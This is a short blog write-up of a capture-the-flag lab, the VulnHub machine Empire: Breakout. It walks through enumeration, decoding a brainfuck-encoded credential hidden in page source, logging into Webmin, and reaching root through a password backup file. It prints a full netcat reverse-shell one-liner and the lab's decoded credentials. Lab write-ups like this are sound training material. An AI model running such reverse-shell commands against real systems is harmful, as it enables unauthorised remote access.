top of page
Image by Blake Cheek
  • Writer's pictureBeri Contraster

Empire: Breakout writeup




Name: "Empire: Breakout"

Date release: 21 Oct 2021

Series: Empire

Difficulty: Easy


Welcome Reader. Today we'll pwn Empire: Breakout from vulnhub. Let's start with an Nmap scan.



User

Didn't find anything interesting on the web. Let's run enum4linux.



I found a username 'cyber'. Looking through the source page I found an encrypted text of brainfuck algorithm.


<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->

This can be decrypted using this. After getting the clear text credentials I logged into the webmin admin panel on port 20000.

cyber:.2uqPEfj3D<P'a-3

After logging into the webmin as cyber I used the terminal to get a reverse shell and upgraded it—Shell upgrade.


Shell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.10.6 4444 >/tmp/f

ROOT

I found tar in the home directory of cyber which got my attention.



I tried reading .old_pass.bak which I found during enumeration. This file had a password in it.



I tried this password for root and it worked.

Thanks for reading if you have any questions please don't hesitate to ask.




15 views2 comments

Recent Posts

See All

2 Comments


Beri Contraster
Beri Contraster
Mar 11

Dummy Comment

Like
Beri Contraster
Beri Contraster
Mar 11
Replying to


Like
bottom of page